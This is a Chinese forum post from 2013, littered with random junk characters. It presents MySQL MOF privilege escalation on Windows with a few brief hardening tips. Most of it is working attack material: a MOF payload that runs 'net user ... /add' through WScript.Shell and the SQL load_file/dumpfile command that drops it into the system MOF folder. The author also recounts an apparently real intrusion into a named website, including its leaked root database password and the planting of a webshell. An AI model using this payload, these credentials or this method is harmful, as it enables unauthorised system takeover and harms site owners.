Mysql mof扩展漏洞防范方法
% _4 j* P3 y1 v+ c9 l: w$ N
) z( r0 F/ Z- r8 f4 n8 H网上公开的一些利用代码:
: {% y |; f9 [" b: M) d
5 S+ | v" j: S+ H h- O3 a#pragma namespace(“\\\\.\\root\\subscription”)
- X. r- y8 f, q5 @1 K
% u* l" X# F& Pinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
- \ d$ x% {) F6 e' B* J- X! ]6 x$ N" z. p+ }# n: o: m! s1 Q, h
5 b0 N( \) B, I, }0 L
! ^; }7 X$ Y% T0 Q5 n, b' U3 t* | # v# x$ J; V7 f! |
2 F; d, z, P% F" Y
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
/ Y" f! S/ ^2 V: w( l: ?. m8 h从上面代码来看得出解决办法:; c0 k8 Z4 m& E2 Y$ S- }
& l9 Q2 F! w4 I+ F0 M* t1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数( E+ b3 }* S; I' j
0 H, X, p" J% b( N: ^- c
2、禁止使用”WScript.Shel”组件; s- r, X" O( ~# j
0 c4 T0 O7 j% P: A2 t
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER6 Z8 M' g* |. w+ t! d G
+ T) T8 g+ Z" d5 m- t2 @3 O4 I8 l当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下0 ^/ Q8 M& y1 A) b
/ O9 P/ z, ~! f2 m i( r
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
9 Z/ K7 z8 x2 z: D9 Q/ y
. v1 I7 f4 w% X, R' t但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
5 r* y% }/ v8 R( e0 i d' r# ?: p( b ~7 I. l
看懂了后就开始练手吧
" N, Y( s: c# i
b% ?5 C$ z! E; ?0 K! b2 g) Zhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
8 |+ t& _5 a) o
# z2 U, Q1 c- v: ]( g8 W& B/ F$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。- k! S% G2 d) _: W9 c
6 p* k# m+ \) ^, R- b
于是直接用菜刀开搞6 \/ |9 Z/ Q; k$ _$ E) n k
8 i8 r6 B. L6 r4 ] W) U
上马先
$ [$ r4 M5 H, E2 w& s: U( v) ]& N0 {, n" y" L( I* V
既然有了那些账号 之类的 于是我们就执行吧…….
: F% s) q! y5 [. _; s) t$ m
% V1 T1 h7 z3 ?小小的说下1 Y* |3 U) U! ?; O( C+ @ r0 E
/ i; x# a& N; A9 L3 h' `( f1 d
在这里第1次执行未成功 原因未知8 m8 O; U4 S0 F6 p4 h
4 O; [; K0 b0 v' [
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。3 C4 }- i' l; H! _7 H. a) D
4 ~& U1 \8 p- c) ? t& S2 Z: P1 K#pragma namespace(“\\\\.\\root\\subscription”)
- g* ?% _8 B6 R
* L3 l Y! k& Z% Qinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };* J# \ F3 v o; A
1 m: T- O- G1 |& l我是将文件放到C:\WINDOWS\temp\1.mof7 A; X" q O. g
! w# ~( q: X' S+ A- K所以我们就改下执行的代码
/ a3 O1 m8 X- x9 e, Q
& u) J4 |: y$ Eselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
! g, m( l' w$ d @) j% ~+ Z' \1 J3 v9 V
. b" ^1 W' t3 l
" c) f" {9 U) P; `5 V但是 你会发现账号还是没有躺在那里。。2 b& X2 y# Q7 |& J$ V
2 J1 c M: d4 R# e3 y+ M3 {; {! l于是我就感觉蛋疼
3 R$ m3 u7 D6 H5 M) U1 S: F! w
就去一个一个去执行 但是执行到第2个 mysql时就成功了………$ ?& K6 F4 E( F. O' B
) K) ]* \* ^, ]5 b" u L8 Z' ^% f; Z. A7 A8 E3 L: p( P
* D' v0 `+ L" w但是其他库均不成功…3 J4 Y* d a( I+ S7 n. d4 D
6 A! ?, J4 D- x V3 U7 k% a ]我就很费解呀 到底为什么不成功求大牛解答…7 u0 A3 R# _& k3 V8 T
7 f; B s( u1 a5 k w* c. Q! N" e' L8 H. q) r6 e9 {2 M+ I
q" F- _! `$ k0 P. B# e, ]( P; V
|
发表于 2013-1-4 19:49:49
收藏
支持
反对